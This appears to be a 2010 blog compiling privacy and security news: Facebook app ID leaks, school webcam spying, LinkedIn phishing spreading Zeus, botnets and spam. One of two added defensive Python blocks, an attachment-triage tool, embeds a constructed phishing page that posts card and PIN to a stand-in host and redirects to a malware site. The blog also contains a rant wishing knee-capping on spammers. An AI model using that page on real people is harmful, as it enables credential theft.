Nowadays a huge number of young people don't have land lines. I am personally of the opinion that because cranky old white folks make up a larger amount of land lines, U.S. polling results are currently skewed (not enough to save the Democrats, but skewed nonetheless).

"Intentional Sample Bias
Intentional sample bias covers a variety of techniques that pollsters use when they select people for the sample. For an extreme example, some polls (like, I think, Zogby) try to get an equal number of people who self-identify as republicans and democrats. But in most states, the number of party members in the two major parties are not equal. They are, in fact, often pretty dramatically uneven. A less dramatic but still significant one is that many polls do their polling through phone calls, and only call land-lines. Many younger people no longer have land-lines; the exclusion of cell-phone numbers therefore excludes some portion of the population from the sample. These kinds of sample bias produce a significant mismatch between the population of real voters, and the population being sampled."

Scienceblogs.com, Good Math, Bad Math - Margin of Error and Election Polls

----

Top picture credit: Nick Rodrigues - http://www.nickrodrigues.com/art/phoneBooth.html

Truman pic credit: Wikipedia - Associated Press photo by Byron Rollins

Monday, October 18, 2010

"Facebook in Privacy Breach; Top-Ranked Applications Transmit Personal IDs, a Journal Investigation Finds" - Wall Street Journal

"Many of the most popular applications, or "apps," on the social-networking site Facebook Inc. have been transmitting identifying information—in effect, providing access to people's names and, in some cases, their friends' names—to dozens of advertising and Internet tracking companies, a Wall Street Journal investigation has found.

The issue affects tens of millions of Facebook app users, including people who set their profiles to Facebook's strictest privacy settings. The practice breaks Facebook's rules, and renews questions about its ability to keep identifiable information about its users' activities secure.

The problem has ties to the growing field of companies that build detailed databases on people in order to track them online—a practice the Journal has been examining in its What They Know series. It's unclear how long the breach was in place. On Sunday, a Facebook spokesman said it is taking steps to "dramatically limit" the exposure of users' personal information."
Wall Street Journal - Facebook in Privacy Breach; Top-Ranked Applications Transmit Personal IDs, a Journal Investigation Finds

----

Facebook applications have been routinely violating the site's privacy policy, giving marketers access to everything users do online, a Wall Street Journal investigation found.

The investigation found that all 10 of the top 10 applications on the social networking site, including the popular game Farmville with 59 million users, transmit user IDs to outside companies, for marketing purposes. In some cases, the applications also transmitted personal information.
Montreal Gazette - Investigation pokes holes in Facebook's privacy policy

----

"According to posts on Facebook's developers blog and the blog of one Web firm critiqued in the WSJ piece, Rapleaf, the apps in question are gathering information through a standard Web feature called the "referer URL."

Attentive readers will recall that the same mechanism was blamed in a May WSJ story about privacy issues at Facebook and MySpace. Referers aren't a bad thing by themselves; they're a basic feature of Web links that allows sites to know which sites visitors are coming from.

In most cases, a referer (the misspelling has become common practice) doesn't say anything about who you are -- only which sites you've visited. That's not the case with Facebook profiles, as the company acknowledged in May. But sanitizing referers in a way that works in all browsers is not an easy thing -- see this lengthy explanation from the Facebook engineering blog for the grisly details.

It looks like Facebook's engineers forgot to make sure their referer-laundering works for Facebook apps, too. And, as the WSJ story notes, some companies -- such as Rapleaf -- made further use of this information:

The apps reviewed by the Journal were sending Facebook ID numbers to at least 25 advertising and data firms, several of which build profiles of Internet users by tracking their online activities"
Washington Post - Latest Facebook privacy scare isn't so new
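The Referer leak the Post describes, as an added illustration that is not code from the Post, Facebook or Rapleaf: what a browser sends as Referer for a page whose URL carries a user identifier, how that identifier shows up in a third party's access log, and the "laundering" step of serving the page under a URL with no identifier. Parameter names, hosts and log lines are constructed, not Facebook's real ones.

```python
"""Referer leakage of user identifiers, and the 'laundering' fix.

Added illustration: the parameter names, hosts and log lines below are
constructed and are not Facebook's real ones.
"""
import re
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

# Query parameters that identify a person if a third party sees them (assumed names).
IDENTIFYING_PARAMS = {"user_id", "fb_sig_user", "profile_id"}


def browser_referer(page_url: str) -> str:
    """What a browser sends as Referer for requests made from page_url:
    the page URL with the fragment and any user:password@ part removed."""
    p = urlsplit(page_url)
    host = p.hostname or ""
    if p.port:
        host = f"{host}:{p.port}"
    return urlunsplit((p.scheme, host, p.path, p.query, ""))


def leaked_identifiers(url: str) -> dict:
    """Identifying query parameters contained in a URL (e.g. a Referer value)."""
    pairs = parse_qsl(urlsplit(url).query, keep_blank_values=True)
    return {k: v for k, v in pairs if k in IDENTIFYING_PARAMS}


def strip_identifiers(url: str) -> str:
    """The laundering step: serve the page (or redirect to it) under a URL
    with no identifying parameters, so whatever the browser later sends as
    Referer to ad servers and trackers carries none of them."""
    p = urlsplit(url)
    kept = [(k, v) for k, v in parse_qsl(p.query, keep_blank_values=True)
            if k not in IDENTIFYING_PARAMS]
    return urlunsplit((p.scheme, p.netloc, p.path, urlencode(kept), p.fragment))


# Apache 'combined' log format: ... "request" status bytes "referer" "user-agent"
_REFERER_FIELD = re.compile(r'" (\d{3}) (\S+) "([^"]*)" "')


def leaking_requests(log_lines):
    """Scan a third party's access log and return (referer, identifiers)
    for every hit whose Referer carried an identifying parameter."""
    findings = []
    for line in log_lines:
        m = _REFERER_FIELD.search(line)
        if not m:
            continue
        referer = m.group(3)
        ids = leaked_identifiers(referer)
        if ids:
            findings.append((referer, ids))
    return findings


# Constructed access-log lines as an ad/tracking server would record them
# when its tracking pixel is loaded from an app page.
SAMPLE_AD_SERVER_LOG = [
    '10.0.0.5 - - [18/Oct/2010:10:00:01 -0400] "GET /pixel.gif HTTP/1.1" 200 43 '
    '"http://apps.example-social.test/farm-game/?user_id=100001234567&ref=canvas" "Mozilla/5.0"',
    '10.0.0.6 - - [18/Oct/2010:10:00:02 -0400] "GET /pixel.gif HTTP/1.1" 200 43 '
    '"http://apps.example-social.test/farm-game/?ref=canvas" "Mozilla/5.0"',
    '10.0.0.7 - - [18/Oct/2010:10:00:03 -0400] "GET /pixel.gif HTTP/1.1" 200 43 '
    '"-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    page = "http://apps.example-social.test/farm-game/?user_id=100001234567&ref=canvas#top"
    print("Referer sent:", browser_referer(page))
    print("Leaks:", leaked_identifiers(browser_referer(page)))
    print("Laundered:", strip_identifiers(page))
    for ref, ids in leaking_requests(SAMPLE_AD_SERVER_LOG):
        print("LEAK in ad-server log:", ref, ids)
```

Browsers now also honour a Referrer-Policy response header (for example `no-referrer`), which did not exist in 2010; keeping identifiers out of the URL remains the robust fix because it does not depend on client support.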

----

Referer issues have been around for a long time. Webmasters (like me) have used them forever to watch where people are coming from. I look at referers in the page counter and tracking software I use on this blog you are reading right now. The difference is that Facebook has a whole crapload of other information that goes with their referers to advertisers. Also, when you visit this site (relatively anonymously), you don't allow me to get access to a list of all your friends and their personal information and their photos...

It always aggravated me when my friends would sign up for Mafia Wars or other games and I would know that their sign-up had just given their game developer access to all my photos and posts. I realise it is all public. I constantly tell everyone I know - as soon as it is off a computer or device you tightly control, consider it "in the wild". That being said... I want to control who has access to my images and information. At minimum, I want to be asked or informed that someone has access.

Just 'cause.

----

Picture credit: http://www.fanpop.com/spots/animal-humor/images/7187361/title/want-some-privacy-please-photo

Wednesday, October 13, 2010

British Telecom's Chief Technology Officer Warns Technology Has Reached A Point Where Privacy/Intrusion Has Fundamentally Changed

this photo stolen from http://www.treehugger.com/files/2008/05/servers-data-centers-energy-efficiency-saving-sensors.php
"Privacy ought to be seen as a human right enforced by tighter government regulations and enforcement. European privacy laws are a good starting point in this process but don't by themselves go far enough, according to Schneier.

The chief technology officer at BT Counterpane said that part of the threat to privacy comes from governments hiring private firms to get around privacy regulations. "Data brokers are being re-purposed for government to do data mining that governments themselves wouldn't be allowed to do.""

The Register - Facebook is 'killing privacy for commercial gain'

----

"BT's chief security technology officer has accused the chief executives of big name tech companies such as Google and Facebook of "deliberately killing privacy" in their quest to boost profits.

Bruce Schneier branded Facebook the "worst offender", alleging that the site deliberately eroded privacy in order to successfully pursue its business model.

"We're not Facebook customers, we're Facebook's product it sells to its customers [the advertisers]," he said. "Facebook wants more users because it's in the business of advertising.""


V3 - Bruce Schneier slams Facebook for deliberately eroding privacy

----
"The difference now, he said, was that the falling cost of storage and processing power made it far easier to keep data such as e-mail conversations, Tweets or postings to a social network page than it was to spend the time managing and deleting the information.

The migration of human social interaction from ephemeral forms that took place face to face into data that never goes away and does not allow us to forget or leave behind our past actions was undoubtedly going to change society, he said.

"Forgetting is a very powerful social tool that helps us get by and get along," he said.

As lives are lived more and more online or via the phone it has led, said Mr Schneier, to a situation in which everyone has to be the guardian of their own privacy policy.

"That's new and fundamentally unnatural," he said.

Deciding what data we are prepared to surrender would be fine if people were given a proper choice, he said.

Unfortunately, he said, users of social networking sites or any online service were being presented with choices defined by priorities they did not choose.

The choices are filtered through the law, which is being outstripped by technological change, leaving people with only what net firms give them or can get away with.

"The social rules are being set by businesses with a profit motive," he said." [bold mine - James]


BBC - Bruce Schneier warns 'profits killing personal privacy'

----

Technology has changed the world when it comes to privacy. We as a global society need to look at how we treat privacy issues.

Just as the new terrible technologies of war changed the way people looked at war and how it was conducted during and after World War 1 (think chemical weapons), just as nuclear weapons changed the way major powers approach each other, so too computing power should force us to re-think the way the world can treat us as individuals.

Computing technology and "expert systems" combined with ubiquitous surveillance is a new phenomenon to the human experience. We have to address it before those who control our societies go too far in controlling our lives.

Freedom is not a birthright. It is earned and fought for every day.

Think about your freedom. It is being taken away even as you read this.

Even as you read this, a computer somewhere is logging both your activity and mine. How that data is used or not used is an important question that urgently needs addressing.

----

Photo Credit: Treehugger - Saving Energy in Data Centers with Smart Sensors and Algorithms

Tuesday, October 12, 2010

School District Remotely Activated Webcams On Students' Computers While They Were At Home; Some Partially Dressed; Lawsuit Settled For $610K

Graphic ripped off from wired magazine article below
"At issue are school-issued Mac laptops provided to 2,300 students at Harriton High School. Unbeknownst to those students and their parents, the laptops were equipped with tracking software that could remotely activate the computer's webcam to take photos of the user, as well as capture screen shots. It was intended as a means to locate lost or stolen laptops, but was apparently activated in more questionable circumstances as well."


PC Magazine - Pa. School District Settles Webcam Spying Case for $610K

"An invasion-of-privacy lawsuit followed, alleging the district had snapped thousands of pictures of its students using webcams affixed to the 2,300 Apple laptops the district issued. Some of the images included pictures of youths at home, in bed or even “partially dressed,” (.pdf) according to a filing in the case. Students’ online chats were also captured, as well as a record of the websites they visited."


Wired - Second Student Sues School District Over Webcam Spying

----

Anyone remember a little while ago when I asked the question:

Do Students/Children Deserve Any Privacy?

"When I read the information above, it makes me think of the kind of activity and thought control used in Orwell's 1984...."

"I suppose, if educators know everything a child does they can correct them... What a fine idea to promote healthy lifestyles and healthy choices... but, do we really want children who are being monitored and re-educated? There is a fine line between guidance and control - and too often I believe schools and teachers (and parents) cross that boundary."

I also asked the questions:

"Do you think that teachers and guidance counselors who get lipped off by a teen or child are going to be fully beneficent when dealing with that child's lifestyle database?"

"Do teachers ever inappropriately retaliate against their students?"


I think this case shows just how stupidly and inappropriately teachers and school administrators can act. In many ways the totally paternalistic attitude of schools and teachers toward students is highly problematic. This case shows how easy it is for "in loco parentis" to tip straight into the "loco" part.

It illustrates how people will always push the envelope - not just teachers and school administrators.

If people have the power to do something, they will likely do it. Read these articles and think about work laptops taken home.

Think about the backdoor into encryption and computers that most law enforcement and "National Security" agencies seem to be asking for these days. Your privacy can be easily violated for trivial reasons. It's not just about people getting watched by spy agencies...

Think about how people at insurance companies or the government look up people's information for personal reasons: CBC - FedEx employee decries government privacy breach


Think about the people at the U.S. passport agency looking up Obama's personal information: MSNBC - Passport files of candidates breached; Records of Clinton, McCain, Obama inappropriately accessed, officials say

----

And one last link to the laptop/webcam story:

The Telegraph - Students win payout after schools spy on them with laptops
A school authority has agreed to pay out $610,000 (£385,000) after admitting it spied on pupils in their homes through the cameras on their laptop computers.


----

Picture credit: Wired Magazine - Second Student Sues School District Over Webcam Spying

Friday, October 8, 2010

LinkedIn Email Attack "Largest Ever" => 25% Of Worldwide Spam That Week

"An email attack targeting users of the LinkedIn social networking service this week was so active that it accounted for nearly one-quarter of all spam email sent at one point, a malware expert says.

Disguised as an invitation from someone to connect with him or her on LinkedIn, the spam is actually a phishing, or identity theft attack, “widely used by criminals to pilfer commercial bank accounts,” said Henry Stern, a senior security researcher with Cisco Systems, in a blog posting.

“This is the largest such attack known to date,” he noted.

Clicking a link in the email takes the victim to a web page that says “Please waiting … 4 seconds” during which time Zeus, a malevolent Trojan horse software program, downloads and embeds itself in the victim’s web browser.

Once embedded, it logs a victim’s keystrokes and “captures personal information, such as online banking credentials,” Stern said."


theStar.com - Email attack targeting LinkedIn users termed ‘largest ever’

----

Last week a major attack occurred. You should know about it and learn from it. Learn how to identify spam and phishing attacks.

I would recommend that even if you can't read all the articles I am linking to in one sitting, you return over the next week and read them all. In the digital world we live in, this is as important as any security primer you will read.

Even if you manage to get things sorted out after your bank account is cleaned out by operators like these people, you will still be out a lot of money. Can you live without the contents of your bank account?

Be safe.

On a personal note, as I was poking about for a graphic for this story on google images, I clicked on an image that looked likely and my anti-virus blocked two intrusion attempts on my computer from clicking on the image and beginning to load the page the image was on. It is a hostile internet out there. Be as careful as you would be taking a nighttime walk in the Congo...

----

This article has a good description of how to analyse an email of this variety:

Dave Hatter blog - WARNING! Phishing attack disguised as LinkedIn invitations & LinkedIn messages is underway!

----

PC World - Warning: Fake LinkedIn Spam Can Steal Your Bank Passwords;
Bogus LinkedIn emails can infect your computer with ZeuS, a password-stealing Trojan. I know, because it just happened to me.


----

"Computer users can protect against attacks by not clicking on links in e-mails and instead typing "www.linkedin.com," for instance, into a browser. Firefox users can install the NoScript plug-in to block JavaScript.

In addition to keeping antivirus and other security software up to date, computer users should also "make sure all Web browser-related software, especially Adobe Reader, Flash, and Java, have the latest security updates," Stern said."



CNET - Fake LinkedIn e-mails lead to Zeus Trojan

----

InformationWeek - LinkedIn Attack Spreads Zeus Financial Malware

----

The National Business Review - Faked LinkedIn email targets bank account details

----

"This particular Zeus variant monitors browser entries for online bank account credentials.

"This strongly suggests that the criminals and individuals behind this most recent attack are most interested in employees with access to financial systems and online commercial bank accounts than anything else," said a Cisco statement."


Technology Digital - Virus-affected LinkedIn; Cisco Systems announced that LinkedIn is currently being used as the ultimate bait for email spam campaign

----

Forbes - Cisco Security Analyst Gives Countermeasures Update on LinkedIn Malware Attack

Thursday, October 7, 2010

"Botnet takedown may yield valuable data"

Photo stolen from wired - see story linked below
"A Botnet is a collection of software agents, or robots, that run autonomously and automatically. The term is most commonly associated with malicious software..." "...this word is generally used to refer to a collection of compromised computers (called zombie computers) running software, usually installed via drive-by downloads exploiting web browser vulnerabilities, worms, Trojan horses, or backdoors, under a common command-and-control infrastructure.

A botnet's originator (aka "bot herder" or "bot master") can control the group remotely..." - Wikipedia
----
"Researchers are hoping to get a better insight on botnets after taking down part of Pushdo, one of the top five networks of hacked computers responsible for most of the world's spam.

Thorsten Holz, an assistant professor of computer science at Ruhr-University in Bochum, Germany, said his group is working on an academic paper focused on methods to figure out what type of malicious spamming software is on a computer that sent a particular spam e-mail.

They looked at several of the major spamming botnets, including Mega-D, Lethic, Rustock as well as Pushdo and Cutwail, two kinds of malware that appear to sometimes work together as part of the same botnet"
ITWorld - Botnet takedown may yield valuable data

----

The above posted for your information. No real commentary.

I think that understanding that the threats are real is critical to understanding why we need to be conscious of access to information, privacy, security, and data management in general.

Understanding that there are people out there using networks to nefarious ends is important to understand why privacy commissioners are beaking off about privacy and security - like in the government BlackBerry story I posted previously.

----

Wired - Botnet Hacker Gets Four Years
March 5, 2009

"A Los Angeles man was sentenced late Wednesday in federal court to four years in prison after pleading guilty last year to infecting as many as 250,000 computers and stealing thousands of peoples’ identities and hijacking their bank accounts.

The Los Angeles authorities said John Schiefer, 27, was the nation’s first defendant to plead guilty to wiretapping charges (.pdf) in connection to using botnets.

Schiefer, who went by the online handle "acidstorm," faced as many as 60 years in prison and acknowledged using a botnet to remotely control computers across the United States. Once in control of the computers, the authorities said, (.pdf) his spybot malware allowed him to intercept computer communications. He mined usernames and passwords on accounts such as PayPal and made purchases totaling thousands of dollars without consent."


----

Picture credit: Wired - Botnet Hacker Gets Four Years

Wednesday, October 6, 2010

"Where are my keys .. I lost my phone"; Federal Privacy Commissioner Issues Strong Warnings

“Where are my keys .. I lost my phone” - Lady Gaga...

"Canada’s privacy watchdog says some federal departments have no security procedures in place for recovering, wiping or encrypting lost and stolen BlackBerry smart phones.

The oversight is just one of a laundry list of potential privacy breaches highlighted by Privacy Commissioner Jennifer Stoddart in a new government report released Tuesday.

The report examined how five federal departments — Canada Mortgage and Housing Corporation, Correctional Service of Canada, Health Canada, Human Resources and Skills Development Canada, and Indian and Northern Affairs Canada — dispose of old PCs and manage their wireless security infrastructure. The five departments represent trends occurring throughout other government departments and were chosen because of the significant amount of personal data they collect, Stoddart said.

The report found that none of the five departments had fully assessed the threats and risks associated with smart phones and wireless communications.

Other notable wireless security issues found during the audit include the lack of any encryption policies for data stored on BlackBerry devices, the liberal use of BlackBerry’s PIN-to-PIN messaging system among bureaucrats, and weak password policies for mobile devices."


IT World Canada - Privacy czar blasts feds on BlackBerry use

----

"In recent years, the use of smart phones such as the BlackBerry, as well as other mobile devices, has become pervasive among federal public servants, just as it has in the private sector. But in an interview, Stoddart said government departments aren't thinking "seriously enough" about how the proliferation of wireless technologies could be putting the personal information of Canadians at risk.

"They were handing out BlackBerrys, in some cases, with no instruction to staff about passwords, or encryption, so it is an area for concern," she said. "It's very concerning that significant parts of the federal government have still not caught up to the implications of the new technology."


Canada.com - Privacy watchdog 'disturbed' by feds' BlackBerry use, disposal of documents

----

Hopefully you'll forgive the gratuitous use of a Lady Gaga picture on this story - she is holding a BlackBerry, and her quoted lyrics indicate a missing cell phone, so that should tie it into the main story a little...

People don't want to learn how to use their technology.

"Waaah! Boo-hoo! I have to learn something new," say the users.

Get over it.

You are carrying around a huge amount of personal information, and in the case of government officials they are likely carrying around other people's information as well.

I wonder how these folks would feel if their lawyer wandered around town with their personal files and didn't take care to secure them? I wonder how they would feel if their doctor wandered around with their health files?

I think the point is made.

It takes about 30 minutes to learn how to set up the privacy settings on a smart phone. It might take another 15 minutes to play with them to make sure you know how to use them properly.

The security is built into the devices. It just has to be turned on.

Take the time.

Spammers Change Delivery Techniques: Infected HTML Attachments On The Rise



(for less technical readers: an HTML attachment is when the email sent to you has an embedded web page in it - James)

----

TechEye.Net - HTML spam breaks banks, floods PCs
And there's more to come

"Spam campaigns using emails with infected HTML attachments accounted for around two and eight percent of all spam, according to Sophos.

The security company said this security threat was particularly rampant over the past four months but June and September were hit the worst with this spam accounting for eight percent of all email threats.

However, it seems the spammers may have been on their summer holidays in July and August with these figures falling.

Graham Cluley, senior technology consultant at Sophos said that part of this was down to a large number of malicious spam with embedded HTML attachments (detected as Troj/JSRedir-BO), and was associated with Facebook password resetting tasks, the FIFA World Cup and Skype in June."

----
"According to Symantec's September 2010 “State of Spam and Phishing” report, spam accounts for 92.51% of all email sent during August 2010, up from 91.89% during July 2010.

Spam originating from the Europe, Middle-East and Africa regions has decreased from 48.97% in June to 43.17% in August 2010.

The biggest concern of the September report, according to Symantec, is spam-distributed malware. Malware spam took a one month hiatus but has returned at triple the volume from the previous month's report.

Malware distributed as .zip attachments to spam emails saw a four-fold increase this month, but there was also a wave of .html attachments containing malicious JavaScript."
MyBroadBand News - Spam report: Top 10 subject lines and massive malware push

----
"Spam campaigns, which generated emails with malicious HTML attachments, have been particularly aggressive during the past four months and they accounted for between two and eight percent of all spam."

"The majority of rogue HTML files served in this manner consist of phishing pages or contain JavaScript code that redirects users to malware pushing websites.

As far as phishing is concerned, attacks employing this technique have targeted the customers of organizations like PayPal or Banchi de Credito Cooperativo.

"Instead of setting up a bogus financial website, scammers insert the phishing contents directly into the HTML attachment," the Sophos researchers explain."
Softpedia News - HTML Attachment Spam Exploded in Recent Months

----

I offer this information to readers of this blog, so that it gives you an idea of what is happening with email based attacks.

The TechEye article has a good list of the kind of results that can occur from even just opening email.

I personally run my email in text only mode. I can't send emails that are all fancy with pretty background graphics, and email sent with such elements are lost on me in these settings. I block all scripts running on email, and I block graphics and other page elements which pull from outside sites.

Always make sure you turn on your anti-phishing capabilities on your browsers and email clients, and don't allow your email to pull page elements in from outside addresses.

One of the critical reasons not to pull in outside graphics is that many of them are fetched from a server using a URL that carries a per-recipient token. By fetching that graphic, you confirm to the sender that your email address is live, that someone reads it, and that your client renders embedded web content.
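The three patterns described above (a script inside the attachment that bounces the browser to a malware site, phishing content inserted directly into the attachment, and a remote image that confirms a live address) can all be triaged without rendering the file. What follows is an added example in Python; it is not code from Sophos, Symantec or this blog. The two sample attachments, the host names in them, and the trusted-host list are constructed for the demonstration.

```python
"""Triage an HTML e-mail attachment for the patterns described above:
JavaScript/meta redirects, phishing forms embedded in the attachment itself,
and remote images used as read-receipt beacons.  Added example; not code
from Sophos, Symantec, or the blog author."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption: the only host the "bank" legitimately serves content from.
TRUSTED_HOSTS = {"bank.example.com"}

# Constructed sample attachment (not a real campaign): a fake bank notice that
# beacons back with a per-recipient token, collects credentials into an
# off-site form, and bounces the browser to a third site via script.
SAMPLE_HTML = """<html><body>
<img src="http://track.example.net/p.gif?uid=7f3a9c&amp;c=42" width="1" height="1">
<p>Your account is locked. Confirm your details to restore access.</p>
<form action="http://login-verify.example.org/submit.php" method="post">
  Card: <input name="cc"> PIN: <input name="pin" type="password">
  <input type="submit" value="Verify">
</form>
<script>window.location = "http://malware.example.com/land.php";</script>
</body></html>"""

# Constructed benign sample: inline (cid:) logo, no script, no form.
CLEAN_HTML = """<html><body><img src="cid:logo@bank.example.com">
<p>Your October statement is attached.</p></body></html>"""

# Assignments to location (window.location = ..., location.href = ...) or
# calls to location.replace()/assign(); "==" comparisons are excluded.
REDIRECT_RE = re.compile(
    r"(?:window|document|top|self)?\.?location(?:\.href)?\s*=(?!=)"
    r"|location\.(?:replace|assign)\s*\(", re.IGNORECASE)


class AttachmentTriage(HTMLParser):
    """Collects (kind, detail) findings while walking the attachment."""

    def __init__(self, trusted_hosts=TRUSTED_HOSTS):
        super().__init__()
        self.trusted = trusted_hosts
        self.findings = []
        self._in_script = False

    def _external(self, url):
        p = urlparse(url)
        return p.scheme in ("http", "https") and p.hostname not in self.trusted

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "script":
            self._in_script = True
            if a.get("src"):
                self.findings.append(("remote_script", a["src"]))
        elif tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            self.findings.append(("meta_refresh", a.get("content", "")))
        elif tag == "img":
            src = a.get("src", "")
            if self._external(src):
                # 1x1 size or a query string carrying a token: a read beacon.
                tiny = a.get("width") in ("0", "1") or a.get("height") in ("0", "1")
                kind = "tracking_image" if tiny or "?" in src else "remote_image"
                self.findings.append((kind, src))
        elif tag == "form":
            action = a.get("action", "")
            if self._external(action):
                self.findings.append(("external_form", urlparse(action).hostname))
        elif tag == "input" and a.get("type", "").lower() == "password":
            self.findings.append(("password_field", a.get("name", "")))

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script and REDIRECT_RE.search(data):
            self.findings.append(("js_redirect", data.strip()[:80]))


def triage(html):
    """Return the findings and a coarse verdict for one attachment."""
    p = AttachmentTriage()
    p.feed(html)
    p.close()
    kinds = {k for k, _ in p.findings}
    if {"external_form", "password_field"} <= kinds:
        verdict = "phishing"          # credentials posted to a foreign host
    elif kinds & {"js_redirect", "meta_refresh", "remote_script"}:
        verdict = "redirect"          # bounce to a malware-pushing site
    elif "tracking_image" in kinds:
        verdict = "tracking"          # confirms the address is live
    else:
        verdict = "clean"
    return {"verdict": verdict, "findings": p.findings}


def finding_kinds(html):
    """Set of finding kinds for an attachment (handy for filtering rules)."""
    return {k for k, _ in triage(html)["findings"]}


if __name__ == "__main__":
    for name, doc in (("sample", SAMPLE_HTML), ("clean", CLEAN_HTML)):
        result = triage(doc)
        print(name, result["verdict"])
        for kind, detail in result["findings"]:
            print("  ", kind, detail)
```

Run it and the constructed sample comes back as "phishing" with the redirect and the beacon listed alongside, while the benign statement notice comes back "clean". The caveat: this is a static parse, so a redirect built from concatenated strings or hidden behind eval() will not match the regex. In practice any script at all inside a mailed HTML attachment is reason enough to quarantine it, which is the same conclusion the text-only, no-scripts mail setup described above reaches without parsing anything.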

----

Personal Rant: Pretty emails with fancy fonts and pictures and backgrounds may look nice and make you warm and happy inside, but are they really worth the kind of automated terror that can be brought on when you open the email? If your computer gets infected because you like pretty emails and someone drains your bank account, will it be worth it then?

Personal Rant 2 Why would anyone ever open an attachment from someone they don't know? Really... why?

Personal Rant 3: If an email arrives claiming to be from your bank and asks you to click on the link in the email, don't. Banks do not send out emails asking for verification of personal information.

The exception to the above rule is if you were just at your bank website and asked to have it send you an email regarding your password, and one arrives within moments of your request...

Tuesday, October 5, 2010

Montreal Man Ordered To Pay Facebook $1 BILLION For Spamming

"MONTREAL - Spammers of the world, beware.

A Montreal man has been ordered to pay Facebook $1 billion after allegedly spamming its members with a variety of messages including penis-enlargement ads.

Quebec Superior Court upheld a ruling by a U.S. court that Adam Guerbuez owed the money for allegedly flooding people's Facebook pages with more than 4 million messages.

The case is touted as a potential precedent-setter — with some calling it the largest such penalty, by far, in Canadian legal history.

But Facebook shouldn't hold its breath waiting for the money. Guerbuez says he's legally broke and therefore not compelled to give anything to the social-networking giant."
Winnipeg Free Press - Spammers of the world, beware; court orders Quebecer to pay Facebook $1 billion

----
"Facebook is trying to stop spammers with something new, disabling clickable links posted in news feed comments.

This is a dramatic step they are taking in their battle against spammers. What they have done is make all external website links non clickable in an effort to cut down on spammers and hackers. So now when someone tries to comment on one of your posts and put a link to let's say Google.com that link will now come up in black."
Examiner.com - Facebook Desperately Trying To Stop Spammers

----
"If you think parasites and other simple life-forms can't thrive in the most basic of media, you haven't looked in my compost pail lately. So leave it to spammers to find the fresh fuel from social networks to ply their junky trade.

One spammer found a loophole in Facebook's photo uploading system and used it to post thousands of Wall messages, most of which promised free iPhones. Thousands of profiles got hit before the company removed the spammy content; Facebook claims no accounts were compromised as a result of the glitch.

There's also a scam going with a fake Facebook Dislike button, which drives unsuspecting users to revenue-generating online surveys, again promising free iPhones or iPads."

"On a statistical basis, this shift in spammer strategy from email to social networking sites tracks perfectly with users' online behavior: Facebook traffic is closing on, and poised to surpass, email volumes and shows no signs of slowing down."
Internet Evolution - Forget Email... Social's the New Spam Vector

----

Wow, do I ever hate spammers.

As a guy whose email account has been around since about 1992, I get around 1000 spam a day to my email account. My spam filters take care of a good deal of it, but I still end up having to delete a lot of spam (at least one hundred a day) from my mailbox.

I am having to invest in more filtering software.

That costs me money. Personally. Right out of my pocket.

Spammers, by spamming, steal from me and make my life miserable. They constantly probe my systems trying to get past all my security so that they can misuse my servers to send their spam. That takes work and monitoring. It's like having someone who is constantly trying to break into your house. It is stressful and upsetting. I'm a computer guy and I take the condition of my servers in the same kind of psychic zone as my pets' health.

My friends have gone as far as to change their email addresses so as to lose the spam they get. I refuse to take that step to date. But there are times I consider it. But I'm stubborn enough to try to stick it out. I don't want the spammers to win.

The $1 Billion award above is an awesome first step. I personally favour the method used by the IRA to deal with people who stepped out of line - it's a practice known as knee-capping. That's where they shoot you in the knee-cap to cause permanent injury in order to punish you. I suspect that Amnesty International might review my membership (if it is still active... have to check on that...) if they ever read this (even though I suspect that in private moments they might have the same base desire).

Spamming

Yeah

Sorry about the rant

Down with spammers!

Online Behavioural Tracking Self-Regulatory Opt Out System Proposed By Advertisers

"As the debate around online privacy and advertiser access to users’ data continues, a group of the advertising industry’s largest trade organizations was to announce on Monday the details of a self-regulatory program that would allow users to opt out of being tracked by its member organizations.

The program provides details on how companies can adopt some of the principles for conducting online behavioral advertising outlined in a report released last July.

The program includes the use of an icon called the “Advertising Option Icon” that marketers can place near their ads or on the Web pages that collect data that is used for behavioral targeting. Users who click on the icon, a lower case letter “I” inside a triangle that is pointing right, will see an explanation of why they are seeing a particular ad and will be able to opt out of being tracked."
New York Times - Ad Group Unveils Plan to Improve Web Privacy

----

The Register - Opting out of behavioural ads to get easier for US users

----
"Five advertising trade groups, including the Direct Marketing Association (DMA) and the Interactive Advertising Bureau (IAB), have launched a new program that will label online advertisements that their members serve based on the Web-surfing habits of consumers.

The five groups on Monday launched AboutAds.info, which gives online advertisers and networks information about the new advertising option icon. The groups are pushing members to use the icon, which will be tied to an opt-out mechanism for targeted advertising, alongside online advertisements.

The action by the five groups comes as some members of the U.S. Congress have explored privacy legislation that would set rules for the collection of personal data by online advertisers. The U.S. Federal Trade Commission also issued revised guidelines for behavioral advertising in February 2009, and it is again looking at new standards."
ComputerWorld - Online groups introduce labeling for targeted ads

----

Do I trust this self-regulatory scheme?

NO

In my opinion, having the opt-out plan won't actually increase privacy protection. It will give the illusion of control to people who surf the net and will lead to most just skipping right past the icon. Or, we're going to get awesome options like the ones provided by FaceBook where you can click the little X to make an ad go away, and then have to answer a quiz about why you dislike the ad - which allows them to do even better behavioural marketing by assessing the negative responses.

I would suspect that the "feeling" of control will also cause less privacy conscious behaviours on the part of users. I don't have a reference handy, but when researching fast food purchasing behaviours, studies have indicated that having the option of a salad on a fast food menu causes consumers to relax about their meal choices and their calorie intake - and end up eating more because people tell themselves "next time I will make a healthier choice" (at least according to post-purchase interviews [as I recall the study report]).

Yeah- self-regulation...

It seems to have worked so well before. Worked so well in favour of regular people.

Think of how well self-regulation worked for big banks in the U.S. recently - heck self-regulation only caused the near collapse of the international financial system, the collapse of the global economy, threw millions upon millions of people out of work, caused a world-wide recession that is still ongoing with substantive economic effects that are predicted to last for 10 years - so, hey, that's only 8 more years. Sure, self-regulation - always an idea with merit.

Monday, October 4, 2010

U.S. National Security Apparatus Says It Needs Even More Routine Access to Your Communications


aLL ur komUnIKayshunZ R minez...

[The U.S. national security apparatus] "...is preparing legislation that would force all Internet communications providers - from social networking sites to smart phones - to give the government more access to intercept and monitor online communications. Law enforcement officials claim that terrorists are "going dark" and that they need more tools to monitor them.

